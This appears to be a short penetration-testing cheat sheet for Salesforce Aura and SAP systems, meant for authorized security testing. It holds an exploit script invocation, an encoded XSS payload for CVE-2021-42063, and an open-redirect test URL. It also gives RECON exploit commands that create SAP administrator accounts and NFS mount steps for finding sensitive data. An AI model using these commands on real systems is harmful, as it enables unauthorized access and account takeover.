Pentesting Enterprise Applications

Salesforce Aura Lightning

https://github.com/moniik/poc_salesforce_lightning 
python3 exploit.py -u https://domain.force.com/path/ -[option]

SAP

SAP Audit&Pentest
SAP PT with Metasploit
SAP PT Basic guide - 1
SAP PT Basic guide - 2
SAP PT Basic guide - 3
Response Header Injection in SAP HTTP Content Server
Bizploit guide
SAP PT Guide by networkintelligence - 1
SAP PT Guide by networkintelligence - 2
SAP PT Guide by networkintelligence - 3

SAP-Pentest-Cheatsheet

SAP Web Interface Vulnerability

#Open Redirection Check
https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL

#Unsecured Protocol (HTTP) Check
http://HOST:PORT/startPage
http://HOST:PORT/sap/public/info

#System Informational Misconfiguration Check
http://HOST:PORT/sap/public/info

#XSS (CVE-2021-42063) - look for /SAPIrExtHelp
https://localhost/SAPIrExtHelp

https://HOST/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

#SAP Information System 1.0 Shell Upload

#CVE-2022-22536 (ICMAD SAP)

#SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/SAP_RECON
# 1. Download zip file
python RECON.py -H 172.16.30.8 -f /1111.zip

# 2. Create SAP JAVA user
python RECON.py -H 172.16.30.8 -u

# 3. Create SAP JAVA Administrator user
python RECON.py -H 172.16.30.8 -a

SAP Network Vulnerability

#SSL Vulnerability Check
sslscan

#NFS Mount
nfs-ls nfs://HOST/mount
mkdir mnt && mount -t nfs HOST:/mount ./mnt
#Search for sensitive information in the mounted NFS share